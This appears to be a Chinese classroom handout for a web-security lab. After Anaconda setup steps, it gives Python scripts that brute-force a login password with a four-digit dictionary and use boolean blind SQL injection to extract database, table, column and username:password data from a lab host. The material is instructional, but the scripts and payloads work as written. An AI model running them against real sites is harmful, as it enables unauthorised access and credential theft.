§1.3 Python

下载Anaconda3：

链接：https://pan.baidu.com/s/13sihp9ycrmPzOS78Cpm90Q?pwd=lch1

提取码：lch1 

下载目录“4.Python/Anaconda3-2021.11-Windows-x86_64.exe”到D:\ISO

双击Anaconda3-2021.11-Windows-x86_64.exe，安装Anaconda3

启动“Jupyter Notebook (Anaconda3)”

New→Python 3

login&loginPHP.ipynb

##(1)login网站：Python编程暴力破解用户名admin的密码

import requests

url = 'http://192.168.112.100/login/login.php'

f=open("num4.txt","rt")

while True:

    payload=f.readline().strip("\n")

    data = {

        'UserName':'admin',

        'Password':payload,

        'submit':'登录'

    }

    res = requests.get(url=url,params=data)

    if not 'Login fail' in res.text:

        print(payload)

        break

##(2)loginPHP网站：Python编程暴力破解用户名wl190514的密码

import requests

url = 'http://192.168.112.100/loginPHP/loginAuth.php'

payload1 = "wl190514' and (ascii(substr(password,%s,1))=%s)#"

res = ''

for i in range(1,21):

    print('------------------')

    print(i)

    for j in range(32,127):

        payload = payload1 % (i,j)

        data = {

            'usernm':payload,

            'passwd':'any'

        }

        r = requests.post(url=url,data=data)

        if not 'Login Failure!' in r.text:

            res += chr(j)

            print(res)

            break

##(3)loginPHP网站：Python编程爆库、爆表、爆字段、爆数据

import requests

url = 'http://192.168.112.100/loginPHP/loginAuth.php'

# payload = "1' and (ascii(substr((database()),%s,1))=%s)#"                    #显示数据库名

# ————爆库：数据库名：mydb

# payload = "1' and (ascii(substr((version()),%s,1))=%s)#"                     #显示DBMS版本信息

# ————DBMS：5.5.68-MariaDB

# payload = "1' and (ascii(substr(  (select (version()))  ,%s,1))=%s)#"        #OK!

# payload = "1' and (ascii(substr(  (concat(0x7e,(version()),0x7e))  ,%s,1))=%s)#"

# payload = "1' and (ascii(substr(  (select table_name from information_schema.tables where table_schema=database())  ,%s,1))=%s)#"

# 显示数据库database()的表名

# payload = "1' and (ascii(substr(  (select table_name from information_schema.tables where table_schema='mydb' limit 0,1)  ,%s,1))=%s)#"

# 显示指定数据库"mydb"的表名

# payload = "1' and (ascii(substr(  (select table_name from information_schema.tables where table_schema='mydb' limit 1,1)  ,%s,1))=%s)#"

# 显示指定数据库"mydb"的第2个表名

# payload = "1' and (ascii(substr(  (select group_concat(table_name) from information_schema.tables where table_schema='mydb')  ,%s,1))=%s)#"

# 显示指定数据库"mydb"的所有表名

# payload = "1' and (ascii(substr(  (select group_concat(table_name) from information_schema.tables where table_schema=database())  ,%s,1))=%s)#"

# 显示当前数据库database()的所有表名

# ————爆表：mydb数据库，表：users

# payload = "1' and (ascii(substr(  (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')  ,%s,1))=%s)#"

# 显示当前数据库database()表"users"中的所有字段名

# ————爆字段：mydb数据库，users表，字段：id,username,password

payload = "1' and (ascii(substr(  (select group_concat(username,':',password) from users)  ,%s,1))=%s)#"

# 显示表"users"中的字段username,password的值

# ————爆记录：users表，字段username,password的值：2:2,1:1,wl190514:7df2cac4

res = ''

for i in range(1,31):

    print('--------------------')

    print(i)

    for j in range(32,127):

        now_payload = payload % (i,j)

        data = {

            'usernm':now_payload,     #login.php的页面源代码中表单的name="usernm",name="passwd"

            'passwd':'any'

        }

        r = requests.post(url=url,data=data)  #login.php的页面源代码中表单的method="post"

        if 'Login Success!' in r.text:    #登录成功返回"Login Success!"

            res += chr(j)

            print(res)

            break

运行：Ctrl+Enter

【教学资源】

(1)4位数字的字典：num4.txt

(2)Jupyter Notebook格式的Python源文件：login&loginPHP.ipynb